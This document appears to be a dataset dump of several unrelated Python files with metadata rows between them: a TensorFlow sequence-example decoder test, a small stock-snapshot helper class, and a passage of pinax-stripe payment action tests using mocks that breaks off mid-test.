def _make_random_serialized_jpeg_images(self, num_frames, image_height,
image_width):
def graph_fn():
images = tf.cast(tf.random.uniform(
[num_frames, image_height, image_width, 3],
maxval=256,
dtype=tf.int32), dtype=tf.uint8)
images_list = tf.unstack(images, axis=0)
return [tf.io.encode_jpeg(image) for image in images_list]
encoded_images = self.execute(graph_fn, [])
return encoded_images
def test_decode_sequence_example(self):
num_frames = 4
image_height = 20
image_width = 30
expected_groundtruth_boxes = [
[[0.0, 0.0, 1.0, 1.0], [0.0, 0.0, 0.0, 0.0]],
[[0.2, 0.2, 1.0, 1.0], [0.0, 0.0, 1.0, 1.0]],
[[0.0, 0.0, 1.0, 1.0], [0.1, 0.1, 0.2, 0.2]],
[[0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0]]
]
expected_groundtruth_classes = [
[-1, -1],
[-1, 1],
[1, 2],
[-1, -1]
]
flds = fields.InputDataFields
encoded_images = self._make_random_serialized_jpeg_images(
num_frames, image_height, image_width)
def graph_fn():
label_map_proto_file = os.path.join(self.get_temp_dir(), 'labelmap.pbtxt')
self._create_label_map(label_map_proto_file)
decoder = tf_sequence_example_decoder.TfSequenceExampleDecoder(
label_map_proto_file=label_map_proto_file)
sequence_example_serialized = seq_example_util.make_sequence_example(
dataset_name='video_dataset',
video_id='video',
encoded_images=encoded_images,
image_height=image_height,
image_width=image_width,
image_format='JPEG',
image_source_ids=[str(i) for i in range(num_frames)],
is_annotated=[[1], [1], [1], [1]],
bboxes=[
[[0., 0., 1., 1.]], # Frame 0.
[[0.2, 0.2, 1., 1.],
[0., 0., 1., 1.]], # Frame 1.
[[0., 0., 1., 1.], # Frame 2.
[0.1, 0.1, 0.2, 0.2]],
[[]], # Frame 3.
],
label_strings=[
['fox'], # Frame 0. Fox will be filtered out.
['fox', 'dog'], # Frame 1. Fox will be filtered out.
['dog', 'cat'], # Frame 2.
[], # Frame 3
]).SerializeToString()
example_string_tensor = tf.convert_to_tensor(sequence_example_serialized)
return decoder.decode(example_string_tensor)
tensor_dict_out = self.execute(graph_fn, [])
self.assertAllClose(expected_groundtruth_boxes,
tensor_dict_out[flds.groundtruth_boxes])
self.assertAllEqual(expected_groundtruth_classes,
tensor_dict_out[flds.groundtruth_classes])
def test_decode_sequence_example_context(self):
num_frames = 4
image_height = 20
image_width = 30
expected_groundtruth_boxes = [
[[0.0, 0.0, 1.0, 1.0], [0.0, 0.0, 0.0, 0.0]],
[[0.2, 0.2, 1.0, 1.0], [0.0, 0.0, 1.0, 1.0]],
[[0.0, 0.0, 1.0, 1.0], [0.1, 0.1, 0.2, 0.2]],
[[0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0]]
]
expected_groundtruth_classes = [
[-1, -1],
[-1, 1],
[1, 2],
[-1, -1]
]
expected_context_features = np.array(
[[0.0, 0.1, 0.2], [0.3, 0.4, 0.5]], dtype=np.float32)
flds = fields.InputDataFields
encoded_images = self._make_random_serialized_jpeg_images(
num_frames, image_height, image_width)
def graph_fn():
label_map_proto_file = os.path.join(self.get_temp_dir(), 'labelmap.pbtxt')
self._create_label_map(label_map_proto_file)
decoder = tf_sequence_example_decoder.TfSequenceExampleDecoder(
label_map_proto_file=label_map_proto_file,
load_context_features=True)
sequence_example_serialized = seq_example_util.make_sequence_example(
dataset_name='video_dataset',
video_id='video',
encoded_images=encoded_images,
image_height=image_height,
image_width=image_width,
image_format='JPEG',
image_source_ids=[str(i) for i in range(num_frames)],
is_annotated=[[1], [1], [1], [1]],
bboxes=[
[[0., 0., 1., 1.]], # Frame 0.
[[0.2, 0.2, 1., 1.],
[0., 0., 1., 1.]], # Frame 1.
[[0., 0., 1., 1.], # Frame 2.
[0.1, 0.1, 0.2, 0.2]],
[[]], # Frame 3.
],
label_strings=[
['fox'], # Frame 0. Fox will be filtered out.
['fox', 'dog'], # Frame 1. Fox will be filtered out.
['dog', 'cat'], # Frame 2.
[], # Frame 3
],
context_features=[0.0, 0.1, 0.2, 0.3, 0.4, 0.5],
context_feature_length=[3],
context_features_image_id_list=[b'im_1', b'im_2']
).SerializeToString()
example_string_tensor = tf.convert_to_tensor(sequence_example_serialized)
return decoder.decode(example_string_tensor)
tensor_dict_out = self.execute(graph_fn, [])
self.assertAllClose(expected_groundtruth_boxes,
tensor_dict_out[flds.groundtruth_boxes])
self.assertAllEqual(expected_groundtruth_classes,
tensor_dict_out[flds.groundtruth_classes])
self.assertAllClose(expected_context_features,
tensor_dict_out[flds.context_features])
def test_decode_sequence_example_context_image_id_list(self):
num_frames = 4
image_height = 20
image_width = 30
expected_groundtruth_boxes = [
[[0.0, 0.0, 1.0, 1.0], [0.0, 0.0, 0.0, 0.0]],
[[0.2, 0.2, 1.0, 1.0], [0.0, 0.0, 1.0, 1.0]],
[[0.0, 0.0, 1.0, 1.0], [0.1, 0.1, 0.2, 0.2]],
[[0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0]]
]
expected_groundtruth_classes = [
[-1, -1],
[-1, 1],
[1, 2],
[-1, -1]
]
expected_context_image_ids = [b'im_1', b'im_2']
flds = fields.InputDataFields
encoded_images = self._make_random_serialized_jpeg_images(
num_frames, image_height, image_width)
def graph_fn():
label_map_proto_file = os.path.join(self.get_temp_dir(), 'labelmap.pbtxt')
self._create_label_map(label_map_proto_file)
decoder = tf_sequence_example_decoder.TfSequenceExampleDecoder(
label_map_proto_file=label_map_proto_file,
load_context_image_ids=True)
sequence_example_serialized = seq_example_util.make_sequence_example(
dataset_name='video_dataset',
video_id='video',
encoded_images=encoded_images,
image_height=image_height,
image_width=image_width,
image_format='JPEG',
image_source_ids=[str(i) for i in range(num_frames)],
is_annotated=[[1], [1], [1], [1]],
bboxes=[
[[0., 0., 1., 1.]], # Frame 0.
[[0.2, 0.2, 1., 1.],
[0., 0., 1., 1.]], # Frame 1.
[[0., 0., 1., 1.], # Frame 2.
[0.1, 0.1, 0.2, 0.2]],
[[]], # Frame 3.
],
label_strings=[
['fox'], # Frame 0. Fox will be filtered out.
['fox', 'dog'], # Frame 1. Fox will be filtered out.
['dog', 'cat'], # Frame 2.
[], # Frame 3
],
context_features=[0.0, 0.1, 0.2, 0.3, 0.4, 0.5],
context_feature_length=[3],
context_features_image_id_list=[b'im_1', b'im_2']
).SerializeToString()
example_string_tensor = tf.convert_to_tensor(sequence_example_serialized)
return decoder.decode(example_string_tensor)
tensor_dict_out = self.execute(graph_fn, [])
self.assertAllClose(expected_groundtruth_boxes,
tensor_dict_out[flds.groundtruth_boxes])
self.assertAllEqual(expected_groundtruth_classes,
tensor_dict_out[flds.groundtruth_classes])
self.assertAllEqual(expected_context_image_ids,
tensor_dict_out[flds.context_features_image_id_list])
def test_decode_sequence_example_negative_clip(self):
num_frames = 4
image_height = 20
image_width = 30
expected_groundtruth_boxes = -1 * np.ones((4, 0, 4))
expected_groundtruth_classes = -1 * np.ones((4, 0))
flds = fields.InputDataFields
encoded_images = self._make_random_serialized_jpeg_images(
num_frames, image_height, image_width)
def graph_fn():
sequence_example_serialized = seq_example_util.make_sequence_example(
dataset_name='video_dataset',
video_id='video',
encoded_images=encoded_images,
image_height=image_height,
image_width=image_width,
image_format='JPEG',
image_source_ids=[str(i) for i in range(num_frames)],
bboxes=[
[[]],
[[]],
[[]],
[[]]
],
label_strings=[
[],
[],
[],
[]
]).SerializeToString()
example_string_tensor = tf.convert_to_tensor(sequence_example_serialized)
label_map_proto_file = os.path.join(self.get_temp_dir(), 'labelmap.pbtxt')
self._create_label_map(label_map_proto_file)
decoder = tf_sequence_example_decoder.TfSequenceExampleDecoder(
label_map_proto_file=label_map_proto_file)
return decoder.decode(example_string_tensor)
tensor_dict_out = self.execute(graph_fn, [])
self.assertAllClose(expected_groundtruth_boxes,
tensor_dict_out[flds.groundtruth_boxes])
self.assertAllEqual(expected_groundtruth_classes,
tensor_dict_out[flds.groundtruth_classes])
if __name__ == '__main__':
tf.test.main()
| 36.124601
| 80
| 0.590784
| 1,488
| 11,307
| 4.192204
| 0.137769
| 0.040398
| 0.044726
| 0.048092
| 0.773164
| 0.754729
| 0.727156
| 0.727156
| 0.727156
| 0.720744
| 0
| 0.051718
| 0.276643
| 11,307
| 312
| 81
| 36.240385
| 0.710967
| 0.094809
| 0
| 0.770115
| 0
| 0
| 0.038756
| 0
| 0
| 0
| 0
| 0
| 0.038314
| 1
| 0.042146
| false
| 0
| 0.038314
| 0
| 0.10728
| 0.003831
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
4aae4ea2c1b4661c54c2e7c215eb7b2f5df9babd
| 937
|
py
|
Python
|
Simulation/stock_snapshot_helper.py
|
SEPHIRONOVA/TradingDataAnalyzer
|
314cb5bc5f5327ceb16d0ce4e283694eb3f16e99
|
[
"MIT"
] | null | null | null |
Simulation/stock_snapshot_helper.py
|
SEPHIRONOVA/TradingDataAnalyzer
|
314cb5bc5f5327ceb16d0ce4e283694eb3f16e99
|
[
"MIT"
] | null | null | null |
Simulation/stock_snapshot_helper.py
|
SEPHIRONOVA/TradingDataAnalyzer
|
314cb5bc5f5327ceb16d0ce4e283694eb3f16e99
|
[
"MIT"
] | null | null | null |
from datetime import datetime, time
from Simulation.stock_snapshot import StockSnapshot
__author__ = 'raymond'
class StockSnapshotHelper:
def __init__(self, stock_snapshot: StockSnapshot):
self.stock_snapshot = stock_snapshot
self._closing_time = time(16, 0, 0)
def get_mid_price(self):
return (self.stock_snapshot.ask_price.last_price + self.stock_snapshot.bid_price.last_price) / 2
def get_high(self):
return (self.stock_snapshot.ask_price.high_price + self.stock_snapshot.bid_price.high_price) / 2
def get_low(self):
return (self.stock_snapshot.ask_price.low_price + self.stock_snapshot.bid_price.low_price) / 2
def is_end_of_trading_hours(self):
if self.stock_snapshot.ask_price.datetime.time() == self._closing_time:
return True
else:
return False
def get_timestamp(self):
return self.stock_snapshot.ask_price.datetime
def get_date(self):
return self.stock_snapshot.ask_price.datetime.date()
| 29.28125
| 98
| 0.790822
| 140
| 937
| 4.935714
| 0.278571
| 0.244573
| 0.270622
| 0.173661
| 0.454414
| 0.454414
| 0.276411
| 0.124457
| 0
| 0
| 0
| 0.008454
| 0.116329
| 937
| 31
| 99
| 30.225806
| 0.826087
| 0
| 0
| 0
| 0
| 0
| 0.007471
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.318182
| false
| 0
| 0.090909
| 0.227273
| 0.772727
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
438e313a3fababddaabb504d1689fedb9f0a78a1
| 133,180
|
py
|
Python
|
pinax/stripe/tests/test_actions.py
|
lock8/pinax-stripe
|
50e846e41718646e85219d31676566ebc3fea477
|
[
"MIT"
] | null | null | null |
pinax/stripe/tests/test_actions.py
|
lock8/pinax-stripe
|
50e846e41718646e85219d31676566ebc3fea477
|
[
"MIT"
] | 114
|
2017-10-18T09:14:02.000Z
|
2019-01-24T19:03:01.000Z
|
pinax/stripe/tests/test_actions.py
|
lock8/pinax-stripe
|
50e846e41718646e85219d31676566ebc3fea477
|
[
"MIT"
] | 1
|
2017-10-20T08:13:09.000Z
|
2017-10-20T08:13:09.000Z
|
import datetime
import decimal
import json
import time
from unittest import skipIf
import django
from django.contrib.auth import get_user_model
from django.test import TestCase
from django.utils import timezone
import stripe
from mock import Mock, patch
from ..actions import (
accounts,
charges,
coupons,
customers,
events,
externalaccounts,
invoices,
plans,
refunds,
sources,
subscriptions,
transfers
)
from ..models import (
Account,
BitcoinReceiver,
Card,
Charge,
Coupon,
Customer,
Discount,
Event,
Invoice,
Plan,
Subscription,
Transfer,
UserAccount
)
class ChargesTests(TestCase):
def setUp(self):
self.User = get_user_model()
self.user = self.User.objects.create_user(
username="patrick",
email="paltman@example.com"
)
self.customer = Customer.objects.create(
user=self.user,
stripe_id="cus_xxxxxxxxxxxxxxx"
)
def test_calculate_refund_amount(self):
charge = Charge(amount=decimal.Decimal("100"), amount_refunded=decimal.Decimal("50"))
expected = decimal.Decimal("50")
actual = charges.calculate_refund_amount(charge)
self.assertEquals(expected, actual)
def test_calculate_refund_amount_with_amount_under(self):
charge = Charge(amount=decimal.Decimal("100"), amount_refunded=decimal.Decimal("50"))
expected = decimal.Decimal("25")
actual = charges.calculate_refund_amount(charge, amount=decimal.Decimal("25"))
self.assertEquals(expected, actual)
def test_calculate_refund_amount_with_amount_over(self):
charge = Charge(amount=decimal.Decimal("100"), amount_refunded=decimal.Decimal("50"))
expected = decimal.Decimal("50")
actual = charges.calculate_refund_amount(charge, amount=decimal.Decimal("100"))
self.assertEquals(expected, actual)
def test_create_amount_not_decimal_raises_error(self):
with self.assertRaises(ValueError):
charges.create(customer=self.customer, amount=10)
def test_create_no_customer_nor_source_raises_error(self):
with self.assertRaises(ValueError) as exc:
charges.create(amount=decimal.Decimal("10"),
customer=None)
self.assertEquals(exc.exception.args, ("Must provide `customer` or `source`.",))
@patch("pinax.stripe.hooks.hookset.send_receipt")
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("stripe.Charge.create")
def test_create_send_receipt_False_skips_sending_receipt(self, CreateMock, SyncMock, SendReceiptMock):
charges.create(amount=decimal.Decimal("10"), customer=self.customer, send_receipt=False)
self.assertTrue(CreateMock.called)
self.assertTrue(SyncMock.called)
self.assertFalse(SendReceiptMock.called)
@patch("pinax.stripe.hooks.hookset.send_receipt")
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("stripe.Charge.create")
def test_create_with_customer(self, CreateMock, SyncMock, SendReceiptMock):
charges.create(amount=decimal.Decimal("10"), customer=self.customer)
self.assertTrue(CreateMock.called)
_, kwargs = CreateMock.call_args
self.assertEqual(kwargs, {
"amount": 1000,
"currency": "usd",
"source": None,
"customer": "cus_xxxxxxxxxxxxxxx",
"stripe_account": None,
"description": None,
"capture": True,
"idempotency_key": None,
})
self.assertTrue(SyncMock.called)
self.assertTrue(SendReceiptMock.called)
@patch("pinax.stripe.hooks.hookset.send_receipt")
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("stripe.Charge.create")
def test_create_with_customer_id(self, CreateMock, SyncMock, SendReceiptMock):
charges.create(amount=decimal.Decimal("10"), customer=self.customer.stripe_id)
self.assertTrue(CreateMock.called)
_, kwargs = CreateMock.call_args
self.assertEqual(kwargs, {
"amount": 1000,
"currency": "usd",
"source": None,
"customer": "cus_xxxxxxxxxxxxxxx",
"stripe_account": None,
"description": None,
"capture": True,
"idempotency_key": None,
})
self.assertTrue(SyncMock.called)
self.assertTrue(SendReceiptMock.called)
@patch("pinax.stripe.hooks.hookset.send_receipt")
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("stripe.Charge.create")
def test_create_with_new_customer_id(self, CreateMock, SyncMock, SendReceiptMock):
charges.create(amount=decimal.Decimal("10"), customer="cus_NEW")
self.assertTrue(CreateMock.called)
_, kwargs = CreateMock.call_args
self.assertEqual(kwargs, {
"amount": 1000,
"currency": "usd",
"source": None,
"customer": "cus_NEW",
"stripe_account": None,
"description": None,
"capture": True,
"idempotency_key": None,
})
self.assertTrue(SyncMock.called)
self.assertTrue(SendReceiptMock.called)
self.assertTrue(Customer.objects.get(stripe_id="cus_NEW"))
@patch("pinax.stripe.hooks.hookset.send_receipt")
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("stripe.Charge.create")
def test_create_with_idempotency_key(self, CreateMock, SyncMock, SendReceiptMock):
charges.create(amount=decimal.Decimal("10"), customer=self.customer.stripe_id, idempotency_key="a")
CreateMock.assert_called_once_with(
amount=1000,
capture=True,
customer=self.customer.stripe_id,
stripe_account=self.customer.stripe_account_stripe_id,
idempotency_key="a",
description=None,
currency="usd",
source=None,
)
@patch("pinax.stripe.hooks.hookset.send_receipt")
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("stripe.Charge.create")
def test_create_with_app_fee(self, CreateMock, SyncMock, SendReceiptMock):
charges.create(
amount=decimal.Decimal("10"),
customer=self.customer,
destination_account="xxx",
application_fee=decimal.Decimal("25")
)
self.assertTrue(CreateMock.called)
_, kwargs = CreateMock.call_args
self.assertEqual(kwargs["application_fee"], 2500)
self.assertEqual(kwargs["destination"]["account"], "xxx")
self.assertEqual(kwargs["destination"].get("amount"), None)
self.assertTrue(SyncMock.called)
self.assertTrue(SendReceiptMock.called)
@patch("pinax.stripe.hooks.hookset.send_receipt")
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("stripe.Charge.create")
def test_create_with_destination(self, CreateMock, SyncMock, SendReceiptMock):
charges.create(
amount=decimal.Decimal("10"),
customer=self.customer,
destination_account="xxx",
destination_amount=decimal.Decimal("45")
)
self.assertTrue(CreateMock.called)
_, kwargs = CreateMock.call_args
self.assertEqual(kwargs["destination"]["account"], "xxx")
self.assertEqual(kwargs["destination"]["amount"], 4500)
self.assertTrue(SyncMock.called)
self.assertTrue(SendReceiptMock.called)
@patch("pinax.stripe.hooks.hookset.send_receipt")
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("stripe.Charge.create")
def test_create_with_on_behalf_of(self, CreateMock, SyncMock, SendReceiptMock):
charges.create(
amount=decimal.Decimal("10"),
customer=self.customer,
on_behalf_of="account",
)
self.assertTrue(CreateMock.called)
_, kwargs = CreateMock.call_args
self.assertEqual(kwargs["on_behalf_of"], "account")
self.assertTrue(SyncMock.called)
self.assertTrue(SendReceiptMock.called)
@patch("pinax.stripe.hooks.hookset.send_receipt")
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("stripe.Charge.create")
def test_create_with_destination_and_on_behalf_of(self, CreateMock, SyncMock, SendReceiptMock):
with self.assertRaises(ValueError):
charges.create(
amount=decimal.Decimal("10"),
customer=self.customer,
destination_account="xxx",
on_behalf_of="account",
)
@patch("stripe.Charge.create")
def test_create_not_decimal_raises_exception(self, CreateMock):
with self.assertRaises(ValueError):
charges.create(
amount=decimal.Decimal("100"),
customer=self.customer,
application_fee=10
)
@patch("stripe.Charge.create")
def test_create_app_fee_no_dest_raises_exception(self, CreateMock):
with self.assertRaises(ValueError):
charges.create(
amount=decimal.Decimal("100"),
customer=self.customer,
application_fee=decimal.Decimal("10")
)
@patch("stripe.Charge.create")
def test_create_app_fee_dest_acct_and_dest_amt_raises_exception(self, CreateMock):
with self.assertRaises(ValueError):
charges.create(
amount=decimal.Decimal("100"),
customer=self.customer,
application_fee=decimal.Decimal("10"),
destination_account="xxx",
destination_amount=decimal.Decimal("15")
)
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("stripe.Charge.capture")
def test_capture(self, CaptureMock, SyncMock):
charges.capture(Charge(stripe_id="ch_A", amount=decimal.Decimal("100"), currency="usd"))
self.assertTrue(CaptureMock.called)
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("stripe.Charge.capture")
def test_capture_with_amount(self, CaptureMock, SyncMock):
charge = Charge(stripe_id="ch_A", amount=decimal.Decimal("100"), currency="usd")
charges.capture(charge, amount=decimal.Decimal("50"), idempotency_key="IDEM")
self.assertTrue(CaptureMock.called)
_, kwargs = CaptureMock.call_args
self.assertEquals(kwargs["amount"], 5000)
self.assertEquals(kwargs["idempotency_key"], "IDEM")
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("stripe.Charge.capture")
def test_capture_with_connect(self, CaptureMock, SyncMock):
account = Account(stripe_id="acc_001")
customer = Customer(stripe_id="cus_001", stripe_account=account)
charges.capture(Charge(stripe_id="ch_A", amount=decimal.Decimal("100"), currency="usd", customer=customer))
self.assertTrue(CaptureMock.called)
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.charges.sync_charge")
def test_update_availability(self, SyncMock):
Charge.objects.create(customer=self.customer, amount=decimal.Decimal("100"), currency="usd", paid=True, captured=True, available=False, refunded=False)
charges.update_charge_availability()
self.assertTrue(SyncMock.called)
class CouponsTests(TestCase):
def test_purge_local(self):
Coupon.objects.create(stripe_id="100OFF", percent_off=decimal.Decimal(100.00))
self.assertTrue(Coupon.objects.filter(stripe_id="100OFF").exists())
coupons.purge_local({"id": "100OFF"})
self.assertFalse(Coupon.objects.filter(stripe_id="100OFF").exists())
def test_purge_local_with_account(self):
account = Account.objects.create(stripe_id="acc_XXX")
Coupon.objects.create(stripe_id="100OFF", percent_off=decimal.Decimal(100.00), stripe_account=account)
self.assertTrue(Coupon.objects.filter(stripe_id="100OFF").exists())
coupons.purge_local({"id": "100OFF"})
self.assertTrue(Coupon.objects.filter(stripe_id="100OFF").exists())
coupons.purge_local({"id": "100OFF"}, stripe_account=account)
self.assertFalse(Coupon.objects.filter(stripe_id="100OFF").exists())
class CustomersTests(TestCase):
def setUp(self):
self.User = get_user_model()
self.user = self.User.objects.create_user(
username="patrick",
email="paltman@example.com"
)
self.plan = Plan.objects.create(
stripe_id="p1",
amount=10,
currency="usd",
interval="monthly",
interval_count=1,
name="Pro"
)
def test_get_customer_for_user(self):
expected = Customer.objects.create(stripe_id="x", user=self.user)
actual = customers.get_customer_for_user(self.user)
self.assertEquals(expected, actual)
def test_get_customer_for_user_not_exists(self):
actual = customers.get_customer_for_user(self.user)
self.assertIsNone(actual)
@patch("pinax.stripe.actions.customers.sync_customer")
@patch("stripe.Customer.retrieve")
def test_set_default_source(self, RetrieveMock, SyncMock):
customers.set_default_source(Customer(), "the source")
self.assertEquals(RetrieveMock().default_source, "the source")
self.assertTrue(RetrieveMock().save.called)
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.customers.sync_customer")
@patch("stripe.Customer.create")
def test_customer_create_user_only(self, CreateMock, SyncMock):
CreateMock.return_value = dict(id="cus_XXXXX")
customer = customers.create(self.user)
self.assertEqual(customer.user, self.user)
self.assertEqual(customer.stripe_id, "cus_XXXXX")
_, kwargs = CreateMock.call_args
self.assertEqual(kwargs["email"], self.user.email)
self.assertIsNone(kwargs["source"])
self.assertIsNone(kwargs["plan"])
self.assertIsNone(kwargs["trial_end"])
self.assertTrue(SyncMock.called)
@patch("stripe.Customer.retrieve")
@patch("stripe.Customer.create")
def test_customer_create_user_duplicate(self, CreateMock, RetrieveMock):
# Create an existing database customer for this user
original = Customer.objects.create(user=self.user, stripe_id="cus_XXXXX")
new_customer = Mock()
RetrieveMock.return_value = new_customer
customer = customers.create(self.user)
# But only one customer will exist - the original one
self.assertEqual(Customer.objects.count(), 1)
self.assertEqual(customer.stripe_id, original.stripe_id)
# Check that the customer hasn't been modified
self.assertEqual(customer.user, self.user)
self.assertEqual(customer.stripe_id, "cus_XXXXX")
CreateMock.assert_not_called()
@patch("stripe.Customer.retrieve")
@patch("stripe.Customer.create")
def test_customer_create_local_customer_but_no_remote(self, CreateMock, RetrieveMock):
# Create an existing database customer for this user
Customer.objects.create(user=self.user, stripe_id="cus_XXXXX")
RetrieveMock.side_effect = stripe.error.InvalidRequestError(
message="invalid", param=None)
# customers.Create will return a new customer instance
CreateMock.return_value = {
"id": "cus_YYYYY",
"account_balance": 0,
"currency": "us",
"delinquent": False,
"default_source": "",
"sources": {"data": []},
"subscriptions": {"data": []},
}
customer = customers.create(self.user)
# But a customer *was* retrieved, but not found
RetrieveMock.assert_called_once_with("cus_XXXXX")
# But only one customer will exist - the original one
self.assertEqual(Customer.objects.count(), 1)
self.assertEqual(customer.stripe_id, "cus_YYYYY")
# Check that the customer hasn't been modified
self.assertEqual(customer.user, self.user)
self.assertEqual(customer.stripe_id, "cus_YYYYY")
_, kwargs = CreateMock.call_args
self.assertEqual(kwargs["email"], self.user.email)
self.assertIsNone(kwargs["source"])
self.assertIsNone(kwargs["plan"])
self.assertIsNone(kwargs["trial_end"])
@patch("pinax.stripe.actions.invoices.create_and_pay")
@patch("pinax.stripe.actions.customers.sync_customer")
@patch("stripe.Customer.create")
def test_customer_create_user_with_plan(self, CreateMock, SyncMock, CreateAndPayMock):
Plan.objects.create(
stripe_id="pro-monthly",
name="Pro ($19.99/month)",
amount=19.99,
interval="monthly",
interval_count=1,
currency="usd"
)
CreateMock.return_value = dict(id="cus_YYYYYYYYYYYYY")
customer = customers.create(self.user, card="token232323", plan=self.plan)
self.assertEqual(customer.user, self.user)
self.assertEqual(customer.stripe_id, "cus_YYYYYYYYYYYYY")
_, kwargs = CreateMock.call_args
self.assertEqual(kwargs["email"], self.user.email)
self.assertEqual(kwargs["source"], "token232323")
self.assertEqual(kwargs["plan"], self.plan)
self.assertIsNotNone(kwargs["trial_end"])
self.assertTrue(SyncMock.called)
self.assertTrue(CreateAndPayMock.called)
@patch("pinax.stripe.actions.invoices.create_and_pay")
@patch("pinax.stripe.actions.customers.sync_customer")
@patch("stripe.Customer.create")
def test_customer_create_user_with_plan_and_quantity(self, CreateMock, SyncMock, CreateAndPayMock):
Plan.objects.create(
stripe_id="pro-monthly",
name="Pro ($19.99/month each)",
amount=19.99,
interval="monthly",
interval_count=1,
currency="usd"
)
CreateMock.return_value = dict(id="cus_YYYYYYYYYYYYY")
customer = customers.create(self.user, card="token232323", plan=self.plan, quantity=42)
self.assertEqual(customer.user, self.user)
self.assertEqual(customer.stripe_id, "cus_YYYYYYYYYYYYY")
_, kwargs = CreateMock.call_args
self.assertEqual(kwargs["email"], self.user.email)
self.assertEqual(kwargs["source"], "token232323")
self.assertEqual(kwargs["plan"], self.plan)
self.assertEqual(kwargs["quantity"], 42)
self.assertIsNotNone(kwargs["trial_end"])
self.assertTrue(SyncMock.called)
self.assertTrue(CreateAndPayMock.called)
@patch("stripe.Customer.retrieve")
def test_purge(self, RetrieveMock):
customer = Customer.objects.create(
user=self.user,
stripe_id="cus_xxxxxxxxxxxxxxx"
)
customers.purge(customer)
self.assertTrue(RetrieveMock().delete.called)
self.assertIsNone(Customer.objects.get(stripe_id=customer.stripe_id).user)
self.assertIsNotNone(Customer.objects.get(stripe_id=customer.stripe_id).date_purged)
@patch("stripe.Customer.retrieve")
def test_purge_connected(self, RetrieveMock):
account = Account.objects.create(stripe_id="acc_XXX")
customer = Customer.objects.create(
user=self.user,
stripe_account=account,
stripe_id="cus_xxxxxxxxxxxxxxx",
)
UserAccount.objects.create(user=self.user, account=account, customer=customer)
customers.purge(customer)
self.assertTrue(RetrieveMock().delete.called)
self.assertIsNone(Customer.objects.get(stripe_id=customer.stripe_id).user)
self.assertIsNotNone(Customer.objects.get(stripe_id=customer.stripe_id).date_purged)
self.assertFalse(UserAccount.objects.exists())
self.assertTrue(self.User.objects.exists())
@patch("stripe.Customer.retrieve")
def test_purge_already_deleted(self, RetrieveMock):
RetrieveMock().delete.side_effect = stripe.error.InvalidRequestError("No such customer:", "error")
customer = Customer.objects.create(
user=self.user,
stripe_id="cus_xxxxxxxxxxxxxxx"
)
customers.purge(customer)
self.assertTrue(RetrieveMock().delete.called)
self.assertIsNone(Customer.objects.get(stripe_id=customer.stripe_id).user)
self.assertIsNotNone(Customer.objects.get(stripe_id=customer.stripe_id).date_purged)
@patch("stripe.Customer.retrieve")
def test_purge_already_some_other_error(self, RetrieveMock):
RetrieveMock().delete.side_effect = stripe.error.InvalidRequestError("Bad", "error")
customer = Customer.objects.create(
user=self.user,
stripe_id="cus_xxxxxxxxxxxxxxx"
)
with self.assertRaises(stripe.error.InvalidRequestError):
customers.purge(customer)
self.assertTrue(RetrieveMock().delete.called)
self.assertIsNotNone(Customer.objects.get(stripe_id=customer.stripe_id).user)
self.assertIsNone(Customer.objects.get(stripe_id=customer.stripe_id).date_purged)
def test_can_charge(self):
customer = Customer(default_source="card_001")
self.assertTrue(customers.can_charge(customer))
def test_can_charge_false_purged(self):
customer = Customer(default_source="card_001", date_purged=timezone.now())
self.assertFalse(customers.can_charge(customer))
def test_can_charge_false_no_default_source(self):
customer = Customer()
self.assertFalse(customers.can_charge(customer))
@patch("pinax.stripe.actions.customers.sync_customer")
def test_link_customer(self, SyncMock):
Customer.objects.create(stripe_id="cu_123")
message = dict(data=dict(object=dict(id="cu_123")))
event = Event.objects.create(validated_message=message, kind="customer.created")
customers.link_customer(event)
self.assertEquals(event.customer.stripe_id, "cu_123")
self.assertTrue(SyncMock.called)
def test_link_customer_non_customer_event(self):
Customer.objects.create(stripe_id="cu_123")
message = dict(data=dict(object=dict(customer="cu_123")))
event = Event.objects.create(validated_message=message, kind="invoice.created")
customers.link_customer(event)
self.assertEquals(event.customer.stripe_id, "cu_123")
def test_link_customer_non_customer_event_no_customer(self):
Customer.objects.create(stripe_id="cu_123")
message = dict(data=dict(object=dict()))
event = Event.objects.create(validated_message=message, kind="transfer.created")
customers.link_customer(event)
self.assertIsNone(event.customer, "cu_123")
@patch("pinax.stripe.actions.customers.sync_customer")
def test_link_customer_does_not_exist(self, SyncMock):
message = dict(data=dict(object=dict(id="cu_123")))
event = Event.objects.create(stripe_id="evt_1", validated_message=message, kind="customer.created")
customers.link_customer(event)
Customer.objects.get(stripe_id="cu_123")
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.customers.sync_customer")
def test_link_customer_does_not_exist_connected(self, SyncMock):
message = dict(data=dict(object=dict(id="cu_123")))
account = Account.objects.create(stripe_id="acc_XXX")
